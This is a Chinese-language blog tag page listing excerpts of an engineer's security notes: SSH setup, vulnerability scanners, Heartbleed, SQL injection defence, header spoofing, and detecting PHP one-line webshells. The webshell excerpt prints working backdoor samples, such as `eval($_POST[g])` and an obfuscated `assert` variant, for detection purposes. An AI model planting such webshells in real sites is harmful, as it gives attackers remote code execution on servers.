親子日記APP
|
免費申請
|
登入
mini box 迷你盒子
這裡是工程師的筆記資料.
部落格
相簿
APP日記
書籤
標籤:
網路安全
的相關文章
瀏覽方式:
摘要列表
|
標題列表
|
全站 《網路安全》 相關
Google Cloud Platform, SSH設定
2024
01
05
22:37
在 GCP 建立完 VM linux 後 (以 CentOS 7為例) VM linux 自動新增一個類似你 gmail 的帳號 例如 gmail =
[email protected]
VM linux 裡頭就會多一個 helloabc_gmail_com 帳號 家裡的 linux 要 ssh 到 VM 先在 linux 下產生 private、public key: $ ssh-keygen -f mykey Generating public/private rsa key pair. Enter passphrase (em...
繼續閱讀»
分類:
網路服務
/
留言(0)
網站安全/弱點、漏洞掃描工具
2021
01
12
15:14
幾款免費的網站弱點掃描軟體 sqlmap https://github.com/sqlmapproject/sqlmap 免費 命令列執行 (無視窗介面) python 撰寫,主要針對網站的 SQL Injection 問題掃描 這個是最常被使用的掃描工具,一些漏洞回報網站常可看到回報者使用這套程式掃到 SQL Injection 問題,如 HITCON ZeroDay
OpenDoor https://github.com/stanislav-web/OpenDoor 免費 命令列執行 (無視窗介面) python 撰寫, OpenDoor OWASP is console ...
繼續閱讀»
分類:
security
/
留言(0)
一句話木馬 簡單偵測
2018
12
06
11:52
各種 PHP【一句話木馬】
<?php eval($_POST[g]);?> <?php $aa = str_replace(x,"","axsxxsxexrxxt"); $aa($_POST["test"]); ?> 例如: <?php function fo(){ //do someth...
繼續閱讀»
分類:
php
/
留言(0)
網路/軟體 安全性相關網站
2014
11
16
14:01
Norse - IPViking Live Norse 提供的網站,即時觀看那個城市/國家正被攻擊以及攻擊者來自哪個城市或國家 http://map.ipviking.com/ Digital Attack Map http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=16245&view=map 呈現全球各地 DDos 的攻擊狀態 還可以「倒帶」顯示某一時間點的攻擊情況 Find out where you are on the Cyberthreat map http://cybermap.kaspersky.com/&n...
繼續閱讀»
分類:
網路服務
/
留言(0)
OpenSSL 重大漏洞 Heartbleed
2014
04
09
22:18
編號 CVE-2014-0160 的 OpenSSL 漏洞 今天爆出來.... 被稱為 Heart bleed = 心臟出血 可見這個漏洞有多嚴重 這個漏洞能讓攻擊者從伺服器的記憶體中讀取 64 KB 的資料 (不用登入伺服器或是特殊權限、管道) 這 64KB 的資料中可能包含 SSL 的 private key、用戶連線過程的 Session資料、Cookie, 甚至 使用者(或是管理員) 的帳號、密碼 果然也馬上出現一段 python 寫的攻擊程式碼: OpenSSL CVE-2014-0160 Heartbleed 嚴重漏洞 | DEVCORE 戴夫寇爾 影響範圍: 使用 OpenSSL 1.0.1 ~ 1.0.1f 都中獎 (201...
繼續閱讀»
分類:
網路服務
/
留言(0)
SQL Injection 基本防範 / MySQL 筆記
2013
05
07
10:41
SQL Injection 基本介紹 簡稱隱碼攻擊,中國大陸稱作SQL注入攻擊.. SQL資料隱碼攻擊 (wiki) 這幾篇是很白話的介紹︰ PHP+MySQL环境下SQL Injection攻防总结 (簡體) SQL Injection with MySQL (簡體) SQL Injection (資料隱碼)– 駭客的 SQL填空遊戲(上) (microsoft) SQL Injection (資料隱碼)– 駭客的 SQL填空遊戲(下) (microsoft) SQL Injection 範例 SQL Injection Attacks by Example 一堆常見的 sql injection 攻擊的範例與原理介紹 SQL Injectio...
繼續閱讀»
分類:
MySQL
/
留言(1)
note: HTTP_X_FORWARDED_FOR 的偽造、安全性
2012
11
22
10:34
HTTP_X_FORWARDED_FOR
這個值是可以 (容易) 偽造的
也不一定能透過這個值來取得用戶端的真實 IP
HTTP_X_FORWARDED_FOR 的值可能長的像這樣:
unknown (看!怪資料)
192.168.0.12, 192.168.236.1 &nb...
繼續閱讀»
分類:
web開發
/
留言(0)
OpenDoor https://github.com/stanislav-web/OpenDoor 免費 命令列執行 (無視窗介面) python 撰寫, OpenDoor OWASP is console ...
Norse - IPViking Live Norse 提供的網站,即時觀看那個城市/國家正被攻擊以及攻擊者來自哪個城市或國家 http://map.ipviking.com/ Digital Attack Map http://www.digitalattackmap.com/#anim=1&color=0&country=ALL&list=0&time=16245&view=map 呈現全球各地 DDos 的攻擊狀態 還可以「倒帶」顯示某一時間點的攻擊情況 Find out where you are on the Cyberthreat map http://cybermap.kaspersky.com/&n...
編號 CVE-2014-0160 的 OpenSSL 漏洞 今天爆出來.... 被稱為 Heart bleed = 心臟出血 可見這個漏洞有多嚴重 這個漏洞能讓攻擊者從伺服器的記憶體中讀取 64 KB 的資料 (不用登入伺服器或是特殊權限、管道) 這 64KB 的資料中可能包含 SSL 的 private key、用戶連線過程的 Session資料、Cookie, 甚至 使用者(或是管理員) 的帳號、密碼 果然也馬上出現一段 python 寫的攻擊程式碼: OpenSSL CVE-2014-0160 Heartbleed 嚴重漏洞 | DEVCORE 戴夫寇爾 影響範圍: 使用 OpenSSL 1.0.1 ~ 1.0.1f 都中獎 (201...